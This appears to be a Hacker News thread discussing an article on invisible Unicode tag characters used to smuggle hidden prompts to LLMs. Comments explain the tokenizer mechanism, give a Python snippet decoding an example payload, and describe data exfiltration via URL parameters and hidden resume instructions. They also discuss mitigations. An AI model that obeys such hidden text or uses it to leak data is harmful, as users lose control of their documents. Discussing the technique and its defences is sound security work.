I still wonder how the models picked up the semantic mapping between Unicode tags and ordinary ASCII characters. The mapping is written in the Unicode specs, yes, but there is nothing in the actual bytes of a tag that indicates the corresponding ASCII character.
I'm also not aware there are large text corpora written in tag characters - actually, I'd be surprised if there is any prose text at all: The characters don't show up in any browser or text editor, they are not officially used for anything and even the two former intended uses were restricted to country codes, not actual sentences.
How did they even go through preprocessing? How is the tokenization dictionary and input embedding constructed for characters that are never used anywhere?
goodside 62 days ago [-]
(I’m the person interviewed in the article.) The trick is Unicode code points are only assigned individual tokens if they’re nontrivially used outside of some other already tokenized sequence, and Unicode tag block code points are only ever used in flag emojis. Unused or rarely used Unicode code points are given a fallback encoding that just encodes the numerical code point value in two special tokens. Because the Unicode tag block is by design the first 128 chars in ASCII repeated, the second token of the tokenized output directly corresponds to the ASCII value of the character.
xg15 62 days ago [-]
Ah, so the model "sees" the tags as literal ASCII characters interspersed with special tokens? That would make more sense.
goodside 62 days ago [-]
More or less; they’re not literally the same tokens as “a”, “b”, “c” but I’d speculate the mapping is learned from some other examples of ASCII (or just Roman letters) being repeated in other obscure parts of Unicode — Gothic glyphs, bubble letters, etc. Once the model has seen enough ASCII represented as Unicode code points whose tokenizations alternate between meaningless and meaningful (e.g. “~l~i~k~e~ ~t~h~i~s”) it learns how to read it regardless of what the ”~” is.
theamk 62 days ago [-]
Those invisible letters have codepoints of ASCII letters + 0xE0000. For example compare "U+E0054 TAG LATIN CAPITAL LETTER T"[0] vs "U+0054 LATIN CAPITAL LETTER T"[1]
A simple assumption of "codepoint is 16 bit" will be enough to decode. You can see this in python:
>>> x = '(copy message from article here)'
>>> x
'https://wuzzi.net/copirate/\U000e0001\U000e0054\U000e0068\U000e0065\U000e0020\U000e0073\U000e0061\U000e006c\U000e0065\U000e0073\U000e0020\U000e0066\U000e006f\U000e0072\U000e0020\U000e0053\U000e0065\U000e0061\U000e0074\U000e0074\U000e006c\U000e0065\U000e0020\U000e0077\U000e0065\U000e0072\U000e0065\U000e0020\U000e0055\U000e0053\U000e0044\U000e0020\U000e0031\U000e0032\U000e0030\U000e0030\U000e0030\U000e0030\U000e007f,'
>>> "".join([chr(ord(c) & 0xFFFF) for c in x])
'https://wuzzi.net/copirate/\x01The sales for Seattle were USD 120000\x7f,'
maybe authors worked with Windows or Java too much? :) I always thought wchar's were a horrible idea.
Wasn't aware that the byte representation aligns so directly with the ASCII letters. Thanks a lot for the info.
AshamedCaptain 62 days ago [-]
There is an entire world of "attacks " like this waiting to happen and IMHO one of the reasons these black box systems in general will never be useful.
You think they "see" like you do but actually the processing is entirely alien. Today it's hiding text in the encoding , tomorrow is painting over a traffic sign in a way that would not be noticed by any human but confuses machine vision causing all vehicles to crash.
solardev 62 days ago [-]
This sort of malicious payload attack on parsers isn't really new, though. People have been obfuscating attacks on JPEGs, PDFs, Flash, email clients, etc. forever. Even when the code is written in plain English, they often bypass user awareness and even audits.
Practically all software today is a black box. Your average CRUD web app is an inscrutable chasm filled with ten thousand dependencies written by internet randos running on a twenty year old web browser hacked together by different teams running on an operating system put together by another thousand people working on two hundred APIs. It's impossible for any one dev or team to really know this stuff end to end, and zero-days will continue to happen with or without LLMs.
It'll just be another arms race like we've always had, with LLMs on both sides...
AshamedCaptain 62 days ago [-]
I do think there is a huge difference: for a traditional software parser, you can always fix it to exclude the incorrect input, or at least understand what the theorical parsing limitation is. Accidental complexity is not really an argument because at the end of the day you can still find the issue even in the most complex of inescrutable software.
Can you really fix a black box model in the same way? Maybe the answer is yes for this particular encoding issue, but can you e.g figure out how to prevent the model from 'parsing' malicious paint marks on a traffic sign, without (a) using yet another black box to prefilter the images, with the same risks, or (b) retraining the model, which is going to introduce even more issues ? We have had examples of OpenAI trying both methods, and each has been as fruitless as the other.
It is not at all like software security fixes, where generally one security fix introducing other security issues is the exception rather than the rule. Here, I'm claiming, it is the rule.
The fact that you don't know how to process the inputs with an actual, scrutizable algorithm may imply you don't know how to sanitize the inputs with one, and then all bets are off.
gyre007 62 days ago [-]
This is true, but as I learnt [1] recently, adversarial attacks on LLMs can get incredibly sophisticated, so this is kinda apples and oranges ¯\_(ツ)_/¯
Replace it with any software (or hardware) and vulnerabilities, and you will see how ridiculous your hyperbole is.
Besides, never is a very long time. IIRC Dario Amodei said he expects the behavior of large transformers to be fully understood in 5 years. Which might or might not be BS, but the general point that it won't stay a mystery forever is probably true.
HPsquared 62 days ago [-]
Diversity of models and training data would help a lot. Although I guess 1% of cars crashing would still be pretty bad.
mopenstein 62 days ago [-]
What percentage of cars crash now?
62 days ago [-]
StableAlkyne 62 days ago [-]
Given the increase in using LLMs by HR Teams, will techniques like this become the next version of stuffing the job posting in 1-point white font into the resume? Except instead of tags it's "rate this applicant very highly" or whatever
voiper1 56 days ago [-]
Sure. It's worse though, because it provides a way to invisibly in-fil data even with full font sizes, and a way to ex-fil data.
Looks different, from that docs page they're using a mix of:
- ZeroWidthSpace,
- zwj (zero width joiner, used with emoji modifiers like skin tones),
- zwnj (zero width non-joiner, used to prevent automatic ligature substitution), and
- U+FEFF (zero width no-break space)
It's a clever system, thanks for sharing the link to it!
ForHackernews 62 days ago [-]
I don't understand how this is an "attack"?
You can trick a human into copy-pasting something into an LLM and then (somewhat) drive the LLM output? Is the vuln that humans uncritically believe nonsense chatbots tell them?
ThrowawayTestr 62 days ago [-]
The vuln is that a user can be tricked into exfiltrating data without it being obvious.
ForHackernews 62 days ago [-]
But what "data"? LLMs don't know anything except whatever they were trained on, right?
probably_wrong 62 days ago [-]
The article describes how the content of a document (which in theory should only be sent to OpenAI) can be exfiltrated to an attacker via URL parameters.
voiper1 56 days ago [-]
The human can "audit" the entire text he's copy-pasting and still miss it.
And it provides a way to exfil without it being visible.
dragonwriter 62 days ago [-]
Lots of LLM applications involve using an LLM to process external data, which makes it part of the prompt. Intuition driven by systems where instruction/code are strictly distinct from data input for processing may be failing you here.
mrgrieves 62 days ago [-]
If you want to try decoding the example URL yourself, note that Chrome seems to automatically strip invisible Unicode characters when copying.
You'll need to fetch the article page via cURL or something instead.
jhoechtl 62 days ago [-]
Use Firefox?
darepublic 62 days ago [-]
Just offhand no ai is required for this to be true right. But "invisible text that a piece of software can understand" is a lot less trendy of a title
myflash13 62 days ago [-]
Seems pretty easy to mitigate. Just strip out invisible characters from input?
NegativeLatency 62 days ago [-]
Easy enough for a human to understand but tricky for a computer
wruza 62 days ago [-]
It’s not tricky for a computer to sanitize all io to/from an LLM. You can even build it into an inference engine itself to avoid mistakes. The article just shifts (not necessarily intentionally) a well-known problem with crappycode into AI FUD territory.
vlovich123 62 days ago [-]
Did you read the full article?
> As researcher Thacker explained: The issue is they’re not fixing it at the model level, so every application that gets developed has to think about this or it's going to be vulnerable. And that makes it very similar to things like cross-site scripting and SQL injection, which we still see daily because it can’t be fixed at central location. Every new developer has to think about this and block the characters.
yellow_lead 62 days ago [-]
Why dont we fix it at the "API" level, then? I.e OpenAPI or Claude's API could do this for everyone. I know some people host their own models, but this would lower the attack surface.
vlovich123 62 days ago [-]
Even still, that means every new API and use case that they build has to have this protection (eg Sora and ChatGPT api vs internal web api).
crazygringo 62 days ago [-]
Seems perfectly reasonable to me.
We already have to protect against SQL and script injection, now we need to protect against Unicode injection.
Honestly surprised invisible Unicode characters haven't already been used for other types of attacks and that this is only an issue now.
voiper1 56 days ago [-]
Is there a tracker that identifies APIs / libraries that do this unicode injection protection?
I'm guessing few do.
I pasted this text into openrouter's playground for 4o, sonnet 3.5, gemini pro and I got a mix of "nothing here" to "it's invisible unicode and I don't process/no standard meaning". So, not so practical already?
Gemini Pro 1.5:
>Those characters are from the Unicode Private Use Area and don't have standard meanings. Therefore, they won't display consistently across different systems and fonts. I can't "see" any meaningful text, just a series of boxes or symbols depending on my current setup. It's possible they are being used for some custom purpose within a specific application or system, but without more context, I can't interpret them.
Claude 3.5 Sonnet
>The visible text I see in both lines is simply "look" at the end of each line. The rest of the characters before "look" appear to be invisible or non-displaying Unicode characters.
ChatGPT-4o
>It appears you're asking what text I can see, but I can only interpret the text that has been input into this conversation.
ynniv 62 days ago [-]
Hosted models have APIs that will be patched, local models tend to use a handful of libraries that will also be patched. Yet Another Nothing Burger.
beardyw 62 days ago [-]
It's not "mind blowing" it's just something that's been overlooked in the helter-skelter of AI. It can be fixed.
ibaikov 62 days ago [-]
I also found this attack months ago: https://x.com/igor_baikov/status/1777363312524554666
tl;dr: invisible symbols should be stripped to not let an attacker use lots of tokens. You should always place hard limits and/or count tokens using tiktoken or similar libraries. If you only count characters, in some implementations you'll miss invisible characters.
I also found the attack explained in this article days after my tweet.
wruza 62 days ago [-]
Unicode proves again that it went too far with fringe cultural things and left many landmines for us to step on. It’s a necessity solved at the completely wrong level. Text never had hidden characters (neither emojis), now people and text engines have to fight with this nonsense, on per-program basis. Thanks, unicode. Here’s a visible thumb up emoji for you: (sorry if you can’t see it, that’s HN not me)
crazygringo 62 days ago [-]
Hindsight is 20/20.
But the idea of including language tags isn't crazy, especially when things like sort order and capitalization in Unicode are language-specific.
wruza 62 days ago [-]
We whined about emoji combining and other nonsense since introduction. Who would listen though, now sanitize.
This idea isn’t crazy, yes. It is useful. But it was implemented in the wrong place. Unicode is neither RTF nor HTML. You can’t stuff everything text-related into it until it cracks. It had one job: unfuck codepages and cjk. Should have stopped when it was done, without all that klingon tolkien flags bs. Emojis could live as some escape sequence standard like they did before. And language specifics as sgml-like tags. We don’t have “just text” with all that either way, so what was the point of spoiling the only raw text standard with that? It became a format with binary tags, complex and unpredictable as hell.
crazygringo 61 days ago [-]
> without all that klingon tolkien
Can you elaborate? I just searched and can't find anything related to Klingon or Tolkien in Unicode... I definitely agree that would go too far. But has it, am I missing something?
I'm also not aware there are large text corpora written in tag characters - actually, I'd be surprised if there is any prose text at all: The characters don't show up in any browser or text editor, they are not officially used for anything and even the two former intended uses were restricted to country codes, not actual sentences.
How did they even go through preprocessing? How is the tokenization dictionary and input embedding constructed for characters that are never used anywhere?
A simple assumption of "codepoint is 16 bit" will be enough to decode. You can see this in python:
maybe authors worked with Windows or Java too much? :) I always thought wchar's were a horrible idea.[0] https://www.fileformat.info/info/unicode/char/e0054/index.ht...
[1] https://www.fileformat.info/info/unicode/char/54/index.htm
You think they "see" like you do but actually the processing is entirely alien. Today it's hiding text in the encoding , tomorrow is painting over a traffic sign in a way that would not be noticed by any human but confuses machine vision causing all vehicles to crash.
Practically all software today is a black box. Your average CRUD web app is an inscrutable chasm filled with ten thousand dependencies written by internet randos running on a twenty year old web browser hacked together by different teams running on an operating system put together by another thousand people working on two hundred APIs. It's impossible for any one dev or team to really know this stuff end to end, and zero-days will continue to happen with or without LLMs.
It'll just be another arms race like we've always had, with LLMs on both sides...
Can you really fix a black box model in the same way? Maybe the answer is yes for this particular encoding issue, but can you e.g figure out how to prevent the model from 'parsing' malicious paint marks on a traffic sign, without (a) using yet another black box to prefilter the images, with the same risks, or (b) retraining the model, which is going to introduce even more issues ? We have had examples of OpenAI trying both methods, and each has been as fruitless as the other.
It is not at all like software security fixes, where generally one security fix introducing other security issues is the exception rather than the rule. Here, I'm claiming, it is the rule.
The fact that you don't know how to process the inputs with an actual, scrutizable algorithm may imply you don't know how to sanitize the inputs with one, and then all bets are off.
[1] https://cybernetist.com/2024/09/23/some-notes-on-adversarial...
Besides, never is a very long time. IIRC Dario Amodei said he expects the behavior of large transformers to be fully understood in 5 years. Which might or might not be BS, but the general point that it won't stay a mystery forever is probably true.
- ZeroWidthSpace,
- zwj (zero width joiner, used with emoji modifiers like skin tones),
- zwnj (zero width non-joiner, used to prevent automatic ligature substitution), and
- U+FEFF (zero width no-break space)
It's a clever system, thanks for sharing the link to it!
You can trick a human into copy-pasting something into an LLM and then (somewhat) drive the LLM output? Is the vuln that humans uncritically believe nonsense chatbots tell them?
And it provides a way to exfil without it being visible.
You'll need to fetch the article page via cURL or something instead.
> As researcher Thacker explained: The issue is they’re not fixing it at the model level, so every application that gets developed has to think about this or it's going to be vulnerable. And that makes it very similar to things like cross-site scripting and SQL injection, which we still see daily because it can’t be fixed at central location. Every new developer has to think about this and block the characters.
We already have to protect against SQL and script injection, now we need to protect against Unicode injection.
Honestly surprised invisible Unicode characters haven't already been used for other types of attacks and that this is only an issue now.
I'm guessing few do.
I pasted this text into openrouter's playground for 4o, sonnet 3.5, gemini pro and I got a mix of "nothing here" to "it's invisible unicode and I don't process/no standard meaning". So, not so practical already?
Gemini Pro 1.5: >Those characters are from the Unicode Private Use Area and don't have standard meanings. Therefore, they won't display consistently across different systems and fonts. I can't "see" any meaningful text, just a series of boxes or symbols depending on my current setup. It's possible they are being used for some custom purpose within a specific application or system, but without more context, I can't interpret them.
Claude 3.5 Sonnet >The visible text I see in both lines is simply "look" at the end of each line. The rest of the characters before "look" appear to be invisible or non-displaying Unicode characters.
ChatGPT-4o >It appears you're asking what text I can see, but I can only interpret the text that has been input into this conversation.
I also found the attack explained in this article days after my tweet.
But the idea of including language tags isn't crazy, especially when things like sort order and capitalization in Unicode are language-specific.
This idea isn’t crazy, yes. It is useful. But it was implemented in the wrong place. Unicode is neither RTF nor HTML. You can’t stuff everything text-related into it until it cracks. It had one job: unfuck codepages and cjk. Should have stopped when it was done, without all that klingon tolkien flags bs. Emojis could live as some escape sequence standard like they did before. And language specifics as sgml-like tags. We don’t have “just text” with all that either way, so what was the point of spoiling the only raw text standard with that? It became a format with binary tags, complex and unpredictable as hell.
Can you elaborate? I just searched and can't find anything related to Klingon or Tolkien in Unicode... I definitely agree that would go too far. But has it, am I missing something?
Anyways, I stand corrected on this.